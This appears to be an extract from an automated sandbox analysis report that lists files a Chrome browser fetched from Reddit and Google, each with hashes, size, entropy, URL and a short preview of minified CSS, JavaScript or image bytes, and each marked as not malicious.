                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):298
                                                  Entropy (8bit):4.755113135338994
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:72AFDB5E6F41D046941BA093EA498B7A
                                                  SHA1:93FCD6378852751579DAE903FD39124DB66C368B
                                                  SHA-256:221406E024234C8A67F2DBD7D4C1BDC43B05F5120589A0544F5059D12D50E263
                                                  SHA-512:84B18617CE435164761796E898358C7E8B1526BA105ABBD320E8267CC78ABD8C4EBF586844F3DB25C626A59E42B5B0FBDCC70A98527159D2E82DEE827BDA518D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/header-client-css-583e4e9f.css
                                                  Preview:#left-nav-drawer::part(base),#left-nav-drawer::part(overlay){top:calc(var(--shreddit-header-height) + 1px)}#left-nav-drawer::part(base){align-items:start;flex-direction:column;justify-content:start;z-index:5}#left-nav-drawer::part(panel){border-radius:0;box-shadow:none;max-height:none;width:280px}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x623, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):79084
                                                  Entropy (8bit):7.997709829498322
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:C05F6ADA0B501E6F98AE0B69DF51EF73
                                                  SHA1:CE6FDCD6F975376F567A06E6F27381BB6D2F91E4
                                                  SHA-256:9A9485A1B9598577B090B9688BC705109E1837F769DF9BBB485791FABBFCD73E
                                                  SHA-512:68251B36471D9F3570EE2B45753FDAFCBFAE70BE209A643D5E9336F780DF75B549C1CFD2154FE82A039633562C38EF3F89895FA8C7007D27E6593FFFDAFB3329
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://preview.redd.it/trump-just-attacked-the-constitution-and-violated-his-oath-v0-r33i8783cawe1.png?width=640&crop=smart&auto=webp&s=83db3e894f2bb00c923f9b2ae6f62482581130c3
                                                  Preview:RIFF.4..WEBPVP8 .4.......*..o.>Q".E#.!....8....~*.!.x.i...p9......0.......).\.X.o..R.#.^...z.P.;.....?..Z..}@<.z}...=....._...^...?.L.U}o=k........_./....~..C}..w._.?.~..e.......>C.G..........[....._.?q.......?....U...?..?W....._........k.......g..._.....#...../...?..l...3.7.....?..`.?...?......e.............+...?..../.......Y.............?...j.........?c...........?.~H}..#.}.W.......?....D.......?..........?..........W..._._.....p.-.G.?....w....|.......'..........i.*.'....y.|......*.F.". kH...p4B5.".:...6...E2AGp@.&..E,k(.....%...)....n.....gi....5R.......<R..hvX..*......T....k-+...>...Y..[...8...W..]...4..F...me#..~..].j..o#O.V.?.x.[.P...C.`......L..}...m.~..:c.?2M...A../..e..gT.t_h.....7...f.{^U...C..9K-XD...o#O.V.?.x.[...l.m..Nd0.S.P.GK.{....F.m:......S_#O.U..k^~..&......[^.l.......[.........L.r2...Yc.'aD.(?BW...4.2....;5~.4.@..^2.G..s...Q:.].d....m......~.[..b..h.>..&Y`...._.)2.Y.j.....U.z..q.....f.sXV.O<.....]`.......6iC(.:.}...p.M.H...(.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1804)
                                                  Category:downloaded
                                                  Size (bytes):1849
                                                  Entropy (8bit):5.2008811415997895
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0B4DCBCF1FA1B12592F1BA075003A4F7
                                                  SHA1:FBF279AA5FD9C4B9A365F5D2B61DF42CB2FF8CB1
                                                  SHA-256:A84BCE8828D3A291F568D1BCF27843475DA692D74DCD6C52E0A54C75A0FF3A7A
                                                  SHA-512:77D557D0C05C3A0D730170379D2279FFB99DEA205ACB0D7232749FF27EA834BF8AC73AA933E4DD9A56E883815D24256E19F6A730713F447B86D7FAF649FFB2C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/guides-224224e6.js
                                                  Preview:const e="guides-confirmation-modal",s="guides_skip_confirmation_modal",t="guides_entry_points_seen",i="streaming-response",a=800,r="/svc/shreddit/guides-recommended-posts",n="guides-recommended-posts-template",d="guides-related-post-list",o="guides-upvote-btn",u="guides-downvote-btn",c="guides-response-container-realtime",g="guides-response-container-ssr",l="guides-search-input",h="guides_reaction_panel_id",p="guides-citation-header",m="GCCA",q="true",G="guides-citation-details",R=`/svc/shreddit/${G}`,_="guides-citation-close-btn",f="scroll-container",v="invisible",E="/answers/",y="h-[calc(100dvh-var(--shreddit-header-height))]",b="guides-citation-template",w="guides-citation-highlight-zone",C="done",S=100,x=3,A={queriesRemaining:-1,timeUntilResetSeconds:-1},D="interestRegistered",U="https://support.reddithelp.com/hc/articles/32026729424916-Reddit-Answers-Currently-in-Beta";var $,k,z,B;!function(e){e.EntryPage="entry",e.ConversationPage="conversation"}($||($={})),function(e){e.GqlRt="g
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5789)
                                                  Category:downloaded
                                                  Size (bytes):5860
                                                  Entropy (8bit):5.222432068648427
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2FC0BC8799E890A475219973EA9FDBD2
                                                  SHA1:56C72F068DD461265D6234A436F3CBD02361EB70
                                                  SHA-256:E227EEF68DDA9321EF99435B96DFDEC1CD0AF53C5CAACB6E3342E3A8802F1D63
                                                  SHA-512:D00C7F42E1DE5F172CF92559366AECCF44F42BA3DA05AB3DA03362596C9DCAC1A8B731D855941854120F778FB81DF931E7D6BBF8A942554D594C83BB2D70DE1D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-media-lightbox-listener-6f703d9b.js
                                                  Preview:import{br as i,_ as t,g as e,n as s,I as o,e as h,cD as l,P as n,aY as a,T as r,t as d,aS as p,u,v as g,cE as c,j as b}from"./shell-4994f581.js";import{a as m,s as _,x,aA as f,I as v}from"./icon-4d9be652.js";import{T as w}from"./index-56e4320e.js";i(m`#shreddit-media-lightbox .media-lightbox-img{max-height:none}#shreddit-media-lightbox .zoomable-img-wrapper{display:block}#shreddit-media-lightbox::part(panel){max-width:100svw;max-height:100svh;width:100svw;height:100svh;border-radius:0}`);let C=class extends _{constructor(){super(...arguments),this._isConnected=!1,this._push=l,this._lightboxUrl=void 0,this.pubsub=new n(this),this._gesture=null,this._isPinchGesture=!1,this.templateRef=a(),this.contentRef=a(),this._hideCloseButtonOnIdle=!1,this.disableAnimations=!1,this.isIdle=!1,this.lightboxOpenHandler=({element:i,attributes:t={}})=>{const{permalink:e}=t;if(e)try{this._lightboxUrl=new URL(`${location.origin}${e}#lightbox`),this._push(this._lightboxUrl.href,{onForwardNav:()=>this.showMod
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6263)
                                                  Category:downloaded
                                                  Size (bytes):6330
                                                  Entropy (8bit):5.311739563463891
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4E0FBD4F317EE834D1C864352F07F282
                                                  SHA1:5A4DE8B788D11DCEED75CBBCA7FD0874EDCAB59F
                                                  SHA-256:83938298E1AB4398D4B896A5392A582A713E93B5A8840B1FD1F4DCC2BBD55D69
                                                  SHA-512:14A83CA2EDED7C1E165A82391EF93C626A89073F191DE36CE097D319C62D41C03F2BCD2ECD615B04B66B11CDFC0748A689AA4E493BDF93B7F052628C6962AE5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/deprecated-content-client-js-d6b00feb.js
                                                  Preview:import"./faceplate-switch-input-14302c35.js";import{s as t,a as e,x as n,o as s}from"./icon-4d9be652.js";import{_ as i,g as o,n as r,e as l,E as a,b0 as d,ct as p,t as h,u as c,v as u,a3 as f,a as b,J as m,N as x}from"./shell-4994f581.js";import"./shreddit-interactable-element-9eb68123.js";import{m as w}from"./xpromo-c45d37b6.js";import"./helpers-ca93cf1a.js";import"./filterNullish-3e68f24c.js";import"./index-169ed00b.js";var v,g;!function(t){t.Slot="slot",t.Wrap="wrap"}(v||(v={})),function(t){t.NSFW="nsfw",t.Spoiler="spoiler",t.NsfwAndSpoiler="nsfwAndSpoiler"}(g||(g={}));const y=t=>{switch(t){case g.Spoiler:return"View spoiler";case g.NsfwAndSpoiler:return"View NSFW content & spoilers";default:return"View NSFW content"}};let S=class extends t{constructor(){super(),this.blurred=!0,this.isNsfwAllowed=!0,this.blurRadius=40,this.mode=v.Slot,this.isCrosspost=!1,this.isRichtextContent=!1,this.hasMetadata=!1,this._windowEvents=new a(this,(()=>window)),this.handleNsfwEvent=t=>{const e=t.detai
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5627)
                                                  Category:downloaded
                                                  Size (bytes):5676
                                                  Entropy (8bit):5.632614708582775
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B73D3E44FF8363AF4A16769192E2DB60
                                                  SHA1:9D2FDEFE71A8F682ED1BB97C9285F190E16E2159
                                                  SHA-256:3100AC407BCA5515436B861F08161E55B260AD779CEF467FABB76DDB22CD8054
                                                  SHA-512:DEF44FF33F5F820276943EEDC1D76A787F22964F49232B0DDF97C2F6C59458C050292758BCBB9469384D2F8998329B087CB45D2E5B1E982FB3A6D605949ED8D8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/ssa-parser-f2f362d6.js
                                                  Preview:import{b as e,p as t}from"./errors-98e883e2.js";const s={CAPTIONS_ENABLED:"captions-enabled",CURRENT_TIME:"current-time",DURATION:"duration",ENDED:"ended",ERROR:"error",FULLSCREEN:"fullscreen",LOADING:"loading",MUTED:"muted",PLAYING:"playing",PAUSED:"paused",SHOW_POSTER:"show-poster",SHOW_RECOMMENDATION_OVERLAY:"show-rec-overlay",USER_IDLE:"user-idle"},a={PROGRESS_FILL_RATE:"--progress-fill-rate",PREVIEW_VIDEO_LEFT_PX:"--preview-video-left-px",SLIDER_BALL_LEFT_PX:"--slider-ball-left-px",VOLUME_FILL_RATE:"--volume-fill-rate"},r="x-auth-token",i="X-Auth-Token";var n;!function(e){e.AUTO="auto",e.METADATA="metadata",e.NONE="none"}(n||(n={}));const l="ad-media",o=`${l}-fullscreenchange`,c=`${l}-pause`,h=`${l}-play`,u=`${l}-timeupdate`,p=`${l}-volumechange`,E=`${l}-seeking`,O=`${l}-seeked`;var f;!function(e){e.TOGGLE_PLAY="TOGGLE_PLAY",e.TOGGLE_FULLSCREEN="TOGGLE_FULLSCREEN",e.TOGGLE_SKIP="TOGGLE_SKIP",e.REWIND_5="REWIND_5",e.FAST_FORWARD_5="FAST_FORWARD",e.INCREASE_VOLUME="INCREASE_VOLUME",
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2081)
                                                  Category:downloaded
                                                  Size (bytes):2150
                                                  Entropy (8bit):5.1271489070026535
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A67E40D5EDB70512048BB038FCB9E52B
                                                  SHA1:9C4D293739FB6DD51B5A6829A062B0A24B41E257
                                                  SHA-256:773D0AA664B3B76760E9B4434D1D857695B9F83F3763D0C5300FAACB4C0490FB
                                                  SHA-512:3D390E65C02AF2236ADDAF425AA49D2CE290EC198CAD6597F18CDF8316E6FFFF8853135F87BA03E07EA41ECED2EA1BC5960BF9CC5671A46DF640AD0F150BBE45
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/feedback-tooltip-overflow-menu-cbfa9270.js
                                                  Preview:import{t,_ as e,av as o,g as s,I as a,aw as n,ax as i,e as r}from"./shell-4994f581.js";import"./header-action-item-chat-client-js-98797a42.js";import{s as c,x as l}from"./icon-4d9be652.js";let h=class extends c{constructor(){super(...arguments),this.translationContextValue=n,this.handleObserverIntersection=t=>{t.forEach((t=>{t.isIntersecting&&(this.observer?.unobserve(this),this.canShowCoachmark()&&(setTimeout(this.open.bind(this),500),this.open()))}))}}connectedCallback(){super.connectedCallback(),this.connectObserver()}disconnectedCallback(){super.disconnectedCallback(),this.disconnectObserver()}connectObserver(){this.observer=new IntersectionObserver(this.handleObserverIntersection,{root:null,threshold:1}),this.observer.observe(this)}disconnectObserver(){this.observer?.disconnect?.()}canShowCoachmark(){return this.translationContextValue.isTranslationActive&&!this.translationContextValue.shouldDisplayCoachmark&&this.translationContextValue.shouldDisplayFeedbackCoachmark}open(){this.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1103)
                                                  Category:downloaded
                                                  Size (bytes):1176
                                                  Entropy (8bit):5.163715574799734
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:29CCA4CA710D433B385A62CA19704101
                                                  SHA1:EC57B009E874EF8BBC47CC390A3428CFF1EE68DA
                                                  SHA-256:C2519D3098AF88743AB00BBC17254179ECC874FFC332D51BD56F3A279165FDB4
                                                  SHA-512:74014B062D9E52112EBC83CF2870B39EE544BA3EBA0AD1A456B5FEDEDB5A26FF8A52455503D4C7A4509D263204393B288F09F70B28CF52E50A38D6C0743E0F5C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-log-takedown-preview-client-js-13462cf3.js
                                                  Preview:import{_ as t,n as o,e}from"./shell-4994f581.js";import{s as r,x as i}from"./icon-4d9be652.js";import{ca as s,cb as a}from"./club-award-confirmation-client-js-b22d6f4f.js";function n(t,o,e){return!0===(null==e?void 0:e.short)?t.toLocaleDateString(o,{month:"short",day:"numeric"}):t.toLocaleString(o,null==e?void 0:e.options)}const l={options:{dateStyle:"full",timeStyle:"long"}};let p=class extends r{constructor(){super(...arguments),this.ts="",this.date=new Date,this.short=!1,this.locale=""}getLocale(){return this.locale||s()}createRenderRoot(){return this}render(){const t=this.getLocale(),o=n(this.date,t,l),e=this.formatOptions?{options:this.formatOptions}:{short:this.short},r=n(this.date,t,e);return i`<time datetime="${this.date.toISOString()}" title="${o}">${r}</time>`}};t([o({type:String})],p.prototype,"ts",void 0),t([o({attribute:"ts",converter:t=>a(t||"")})],p.prototype,"date",void 0),t([o({type:Boolean})],p.prototype,"short",void 0),t([o({type:String})],p.prototype,"locale",void 0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1718)
                                                  Category:downloaded
                                                  Size (bytes):2868
                                                  Entropy (8bit):5.1416553457589975
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ED169179319526D256E55E60C8F54109
                                                  SHA1:FFCA02A037A8F0C4D62D6682B467CEAD91C71187
                                                  SHA-256:22D15D9186CBFE9FE4F204EF49F4039065426D55FDE224037D9C86D48288A397
                                                  SHA-512:65F245341BB2F12E5FEDF142994164AAFA5574CF857C5A3F0B2204B137DA8870960F2B4EACFCAA13839A2CF70433435B4D5B6ADE6D555A6408A39962C20252CD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-coachmark-56fcc983.js
                                                  Preview:import{_ as r,n as o,a3 as a,aS as p,Y as e,e as t}from"./shell-4994f581.js";import{x as c,l,a as s}from"./icon-4d9be652.js";import{T as n}from"./tooltip.base-aa9be46d.js";import{P as i}from"./rpl-popper-3f91bd17.js";class h extends n{constructor(){super(...arguments),this.variant="plain",this.placement=i.Bottom,this.disabled=!1,this.label="",this.distance=8,this.animationNames={show:"coachmark.show",hide:"coachmark.hide",denyClose:"coachmark.denyClose",overlayShow:"coachmark.overlay.show",overlayHide:"coachmark.overlay.hide"}}connectedCallback(){super.connectedCallback(),this.addEventListener("rpl-coachmark-card:close-button-clicked",this.hide)}disconnectedCallback(){super.disconnectedCallback(),this.removeEventListener("rpl-coachmark-card:close-button-clicked",this.hide)}render(){return c` <rpl-popper ?active="${this.open}" strategy="${this.hoist?"fixed":"absolute"}" .anchor="${this.anchor}" flip shift arrow safe-area distance="${this.distance}" skidding="${this.skidding}" placement=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4010)
                                                  Category:downloaded
                                                  Size (bytes):4068
                                                  Entropy (8bit):5.170654513618744
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1754566DDE1C3A6CF03C5C59A073C535
                                                  SHA1:296D83F9AAC4CBA3B664F9529B5892F8D29C32DD
                                                  SHA-256:EFAF756A65DF41CA12DAEBDF33A0CE35F8A7BA4DD61A3A12148AD3BC85CD786D
                                                  SHA-512:1E76516F82028B5F4E849B727EF985F13453E1A8FA741C469AB3186BD7CC2819D0AE14448A6A4FE7C28AF8AA8BE0827B51A85A427E91F64978811A5EBC66FBB9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/feed-post-client-js-5df0a42f.js
                                                  Preview:import{t,_ as s,n as i,g as e,e as o}from"./shell-4994f581.js";import"./mod-post-list-client-js-2beb017f.js";import"./shreddit-media-lightbox-listener-6f703d9b.js";import"./partial-feed-post-client-js-9de4a8bc.js";import"./shreddit-post-flair-27335ad2.js";import"./shreddit-tweet-embed-40b0c344.js";import"./shreddit-pubsub-publisher-5f47a01a.js";import"./user-hover-card-client-js-cc766b03.js";import"./author-flair-event-handler-2f9b1a2c.js";import"./mod-notes-opener-2372b76a.js";import"./community-status-bottom-sheet-a47bf0a8.js";import"./recommends-feed-client-js-679e639f.js";import"./rpl-tooltip-958cc522.js";import{s as r,x as a}from"./icon-4d9be652.js";import"./content-tags-a63901fd.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";import"./index-56e4320e.js";import"./mod-log-takedown-preview-client-js-13462cf3.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import"./number-68
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):16
                                                  Entropy (8bit):3.875
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C6CB4F21C7DCEB18C48B802BDE96868D
                                                  SHA1:D44E74B07ED4E8267728C2BCDD16599E9110D05B
                                                  SHA-256:B77A3071A80FC28A1E314D251064103CF265866101F7CDCCCF00B77C80484BD5
                                                  SHA-512:8C65A0458DD4A8B93AEEA70A0CA67DB43B6E1C0DAAB17B7091449335532F3F5489E5B8A1617B42B99EE95B66CD8EF3E572F537121C9960743E100FE560F4C0F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCU6TGJZIbpK5EgUNPR9TPCGCFvxeIk7oRw==?alt=proto
                                                  Preview:CgkKBw09H1M8GgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (336)
                                                  Category:downloaded
                                                  Size (bytes):404
                                                  Entropy (8bit):4.998526063330336
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:27EF515CE6B4F65F2D769A602A221391
                                                  SHA1:5E4BA358CF9ADDB31638F9A701C7DFCE3AEE9C7E
                                                  SHA-256:D2E4941D5D87E41E04188C61D4D7819C235575DE306946D5B60EB0B960FD5384
                                                  SHA-512:92A24639ECC79BC4C06BC0B31E176809734CB6F5CF6B358DD4EE1C85F3158FD8D9AF7B9D110664783FAB66E0E38EF3215B7E89319A4FE7666A46A646E3C6D692
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/popular-communities-client-js-26b5cc9d.js
                                                  Preview:import"./shell-4994f581.js";import{i}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./icon-4d9be652.js";i({listId:"popular-communities-list",seeButtonId:"popular-communities-list-see-more"}),window.addEventListener("afterRoute",(()=>i({listId:"popular-communities-list",seeButtonId:"popular-communities-list-see-more"})));.//# sourceMappingURL=popular-communities-client-js-26b5cc9d.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (388)
                                                  Category:downloaded
                                                  Size (bytes):469
                                                  Entropy (8bit):4.929575651079013
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E6BA7F973C0CDBC66CB3F80D24BA346C
                                                  SHA1:22EEDE53B5FD3F0974550523B5D65C29E52791A5
                                                  SHA-256:5E535E93110A0A9187BD910B9D65C5BB172B6897691914ECDE90594D5FA04E06
                                                  SHA-512:CCD7EB816C336755C30F65F69B512013BA58A6AF1AEABB7E63D26047738F9A383FC89C51148162F8BCD525E6BE2D74577B258E87A9481E8EF8D8BF53D1147172
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.js
                                                  Preview:import"./shell-4994f581.js";import"./shreddit-coachmark-trigger-2a03d032.js";import"./emoji-template-table-client-js-bd12eb08.js";import"./rpl-hovercard-afe2140e.js";import"./rpl-tooltip-958cc522.js";import"./icon-4d9be652.js";import"./hovercard.base-1e594a4d.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./rpl-popper-3f91bd17.js";import"./tooltip.base-aa9be46d.js";.//# sourceMappingURL=qr-code-persistent-button-upsell-client-js-514ab4ef.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3967)
                                                  Category:downloaded
                                                  Size (bytes):4016
                                                  Entropy (8bit):5.095095133447323
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5903EEE1320EE2857A6ABA1E8F3F53A8
                                                  SHA1:D45E0C047AA7CE5AF1A7A770B7A9D9A719648DBB
                                                  SHA-256:2D88FD28A21D5D4A6AB71047FCF5B54D478AED16BCF37FE28BA54736C195111C
                                                  SHA-512:08301B823B12C4418F76633D5FA71CCE7D8CDD8CE70B32533C7A85BA3C2375D0BAF9F0148FCEFD8281170EED41F4172623A04F3FC6F46137F68DABED9736C51E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/modActions-7666e3bf.js
                                                  Preview:import{hj as o,b as n,Z as e,q as r,O as a,K as t}from"./shell-4994f581.js";import{al as i}from"./club-award-confirmation-client-js-b22d6f4f.js";var s;!function(o){o.Comment="t1",o.Profile="t2",o.Post="t3",o.Message="t4",o.Subreddit="t5",o.Trophy="t6"}(s||(s={}));const c=o=>{const n=o.split("_").shift();return Object.values(s).includes(n)?n:void 0},u=o=>c(o)===s.Comment,d=o=>c(o)===s.Post,l="new_awards";function _({thingId:o,awardId:n,groupId:e,subredditId:r,postId:a,pageType:t,paneName:i,position:s,recipientId:c,isAnonymous:l,hasMessage:_,awardPrice:p,topAwardIconUrl:m,animatedAwardIconUrls:w,reason:f,correlationId:g,postType:h,postScore:b,score:v,numberComments:y,referrerCorrelationId:k}){const I={new_award:{}};return n&&(I.new_award.id=n),e&&(I.new_award.group_id=e),c&&(I.new_award.recipient_id=c),null!=l&&(I.new_award.is_anonymous=l),null!=_&&(I.new_award.has_message=_),void 0!==p&&(I.new_award.listing_price=p),m&&(I.new_award.top_award_icon_url=m),w&&(I.new_award.animated_awards_i
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1989)
                                                  Category:downloaded
                                                  Size (bytes):2060
                                                  Entropy (8bit):5.195327943553658
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D1B147D5CF5DC106316DE32447B18691
                                                  SHA1:E42BED05940D3B2EB10E4D5B2D42E133D1D41466
                                                  SHA-256:B93C0CA046364B018705ABC51DD1D11667C32523442E2DB8239FFC4A7764968B
                                                  SHA-512:A019448B8ABF7ECCD23583EC0B2CCCECA496142C93748F0B1E35265E168A12D1AAE45E614CF8CFE80502CBD93B89E0C6F183D7CFF291592CF3FD4054EB5D0628
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-distinguished-post-tags-600428b5.js
                                                  Preview:import{P as s,aG as t,T as i,t as e,_ as a,n as o,e as d}from"./shell-4994f581.js";import{s as r,E as n,I as p,A as u,x as c,a as l}from"./icon-4d9be652.js";import{g as b,a as h}from"./distinguished-tags-28b29a34.js";import{P as m}from"./overflow-menu-actions-fd509c7d.js";import{q as g}from"./club-award-confirmation-client-js-b22d6f4f.js";let y=class extends r{constructor(){super(...arguments),this.pubsub=new s(this),this.postId="",this.paidSubscriberBadge=!1,this.class="",this.onPostUpdateAction=({postId:s,action:i,value:e})=>{const a=s;this.postId===a&&(i===m.distinguishAsMod?this.distinguishedAs=e?t.Moderator:void 0:i===m.distinguishAsAdmin&&(this.distinguishedAs=e?t.Admin:void 0))}}connectedCallback(){super.connectedCallback(),this.pubsub.subscribe(i.PostUpdated,this.onPostUpdateAction,!1)}disconnectedCallback(){super.disconnectedCallback(),this.pubsub.unsubscribe(i.PostUpdated,this.onPostUpdateAction)}get authorType(){return this.distinguishedAs===t.Admin?"admin":this.distinguishe
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 320x167, components 3
                                                  Category:dropped
                                                  Size (bytes):15574
                                                  Entropy (8bit):7.969772657693725
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:15B3B2D53267B2DC7899850595451AF1
                                                  SHA1:4923A310ECAD44E626EE1134C05F239F240E3D21
                                                  SHA-256:8D46791FA55D89A748B796DCBD97654A0622260803A06CF3C328783781B6DBD3
                                                  SHA-512:95193320AF03F0DCB83251BFEAEB724D6C75F568277CBC3F3EB03D58D8E9AD5A789326CEDD21CC55BC640A500A13C2523DFCA04C5C905617AA283CA887CA19EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@.."........................................L.........................!.1.A.."Qaq.#2....B..%345CSbr..$cs.....TU...DRt..................................7........................!.1."#2AQq.3Bar.....4R...%5Cs............?...........v..|{.".X.8.8.C..;ZHC...j.I.?..'.:~..i`.-.Ky..,81f.'o..T...v....(m.....?..Y8...j.t._Q..wN0.S.).E.X.@..>..Pb..N.........}...F.toZ%.I....UA*&........H5w.c.Z..<pd.OAY.^u..osl...91.{.!.._Hi..M....n..h...).^.....t..-...S&...d}y.K)Z8SH..'...:..Xl:...>.z.3...M.$... x.`.O...|.......H.yn4.Gx.[..cl.j...ESuv..C..O....0i..m.>_n.o....^...n.6.nb.f.fe.1.8.j..a=..h.P..a..cV.:}.(<9.|v......H.......S......`!|F.''.4m..ck..r..Z.....)...'......G..m/z..+.4...I.......4.~..nU..F...k.4$c!.;,5gMs.eoW........s...F.-.J.......+.[>.....D....7..B..`..4..'..f..;M.n.;\.m...:.Wkp....1..-..r.$..3..mF..BB...5G.Z..>.,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10389)
                                                  Category:downloaded
                                                  Size (bytes):10438
                                                  Entropy (8bit):5.28278856516848
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:504EA1C8870D6B7BF4B9081DC22D9827
                                                  SHA1:59906E457CB4113BE9C8BE9B438243E21BEE974D
                                                  SHA-256:47569B95825098D4CAB3CA7B5FD1AEFE95615E8E2CE9B84541A73CDB0998666E
                                                  SHA-512:C4078717B307DADE095F96F8AD9F676CCF2341A7CDC08FD688031063E5C2859F0765954EEEEB62939AE4B50F790B491BCF3750DB1124769A33F5673D73B7F833
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/with-share-687454db.js
                                                  Preview:import{O as e,a8 as t,u as s,v as o,a9 as a,b as i,dT as r,a as n,_ as l,n as c,aP as h,r as p,bv as u,c as d,H as m,bz as k}from"./shell-4994f581.js";import{x as g,l as y,c as b,I as S,ba as w,A as v,Q as C}from"./icon-4d9be652.js";import{a as f}from"./ui-strings-aad5fab2.js";import{c as $,I as _}from"./content-action-button-5fdf727f.js";import{l as E,L as x}from"./expandable-section-header-e3f969c2.js";import{S as M,s as P}from"./index-7436fa38.js";import"./rpl-tooltip-958cc522.js";import{S as I}from"./profile-creation-61d368d7.js";import"./rpl-coachmark-56fcc983.js";import"./rpl-coachmark-card-556887f7.js";import{P as N}from"./rpl-popper-3f91bd17.js";import"./tooltip.base-aa9be46d.js";const D="share-menu-template",B="comment-share-menu-template",L="share-menu-copy-link-option",T="share-menu-crosspost-option",A="share-menu-embed-option",j="share-dropdown-menu",z=e=>({target:t,placement:s})=>Q({...e,target:t,placement:s??e.placement}),O=({content:e,experienceName:t,source:i})=>g`<rpl-
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4536)
                                                  Category:downloaded
                                                  Size (bytes):4581
                                                  Entropy (8bit):5.264550831424608
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B9DCAF754BB2783A297CA6F712497576
                                                  SHA1:5067B16BF3F18F848E4E8DD1F0CD8200803316A5
                                                  SHA-256:ADC44D3FCF5286CDC86BB31EDE42C9D2637DAF49A33DFE53579AD81501F38C3B
